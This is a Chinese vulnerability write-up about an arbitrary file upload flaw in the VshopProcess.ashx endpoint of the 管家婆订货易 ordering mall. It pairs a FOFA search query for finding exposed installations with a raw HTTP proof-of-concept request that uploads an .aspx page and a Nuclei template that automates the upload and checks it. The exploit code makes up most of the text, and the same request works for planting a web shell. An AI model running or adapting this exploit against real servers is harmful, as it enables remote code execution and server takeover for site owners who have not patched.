管家婆订货易在线商城 VshopProcess 任意文件上传漏洞-编程知识

管家婆订货易在线商城 VshopProcess 任意文件上传漏洞

免责声明：文章来源互联网收集整理，请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失，均由使用者本人负责，所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

Ⅰ、漏洞描述

管家婆订货易，帮助传统企业构建专属的订货平台，PC+微信+APP+小程序+h5商城5网合一，无缝对接线下的管家婆ERP系统，让用户订货更高效。支持业务员代客下单，支持多级推客分销，以客带客，拓展渠道。让企业的生意更轻松。

管家婆订货易在线商城VshopProcess.ashx接口处存在任意文件上传漏洞，恶意攻击者可能利用此漏洞上传恶意文件最终导致服务器失陷。

Ⅱ、fofa语句

title="订货易"||title="管家婆分销ERP" || body="管家婆分销ERP" || body="ERP V3"

Ⅲ、漏洞复现

POC

POST /API/VshopProcess.ashx?action=PostFileImg HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, likeGecko) Chrome/57.0.578.100 Safari/537.36
Accept-Encoding: gzip
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarytCOFhbEjc3IfYaY5------WebKitFormBoundarytCOFhbEjc3IfYaY5
Content-Disposition: form-data; name="fileup1i"; filename="ceshi.aspx"
Content-Type: image/jpeg<%@ Page Language="C#" %>
<% 
Response.Write("Hello World!");
System.IO.File.Delete(Request.ServerVariables["PATH_TRANSLATED"]);
%>------WebKitFormBoundarytCOFhbEjc3IfYaY5--

1、构造数据包,上传ceshi.aspx自删除文件

2、访问上传文件

http://127.0.0.1/Storage/UserFileImg/061b524e-3ae6-455e-bdc4-a815522331d1.aspx

Ⅳ、Nuclei-POC

id: GJP-VshopProcess-uploadfileinfo:name: 管家婆订货易在线商城VshopProcess.ashx接口处存在任意文件上传漏洞，恶意攻击者可能利用此漏洞上传恶意文件最终导致服务器失陷。author: WLFseverity: highmetadata: fofa-query: title="订货易"||title="管家婆分销ERP" || body="管家婆分销ERP" || body="ERP V3"
variables:filename: "{{to_lower(rand_base(10))}}"boundary: "{{to_lower(rand_base(20))}}"
http:- raw:- |POST /API/VshopProcess.ashx?action=PostFileImg HTTP/1.1Host: {{Hostname}}User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, likeGecko) Chrome/57.0.578.100 Safari/537.36Accept-Encoding: gzipConnection: closeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Content-Type: multipart/form-data; boundary=----WebKitFormBoundarytCOFhbEjc3IfYaY5------WebKitFormBoundarytCOFhbEjc3IfYaY5Content-Disposition: form-data; name="fileup1i"; filename="{{filename}}.aspx"Content-Type: image/jpeg<%@ Page Language="C#" %><% Response.Write("Hello World!");System.IO.File.Delete(Request.ServerVariables["PATH_TRANSLATED"]);%>------WebKitFormBoundarytCOFhbEjc3IfYaY5--- |GET {{path}} HTTP/1.1Host: {{Hostname}}User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0extractors:- type: regexname: pathpart: bodyregex:- '.*'internal: truematchers:- type: dsldsl:- status_code==200 && contains_all(body,"Hello World!")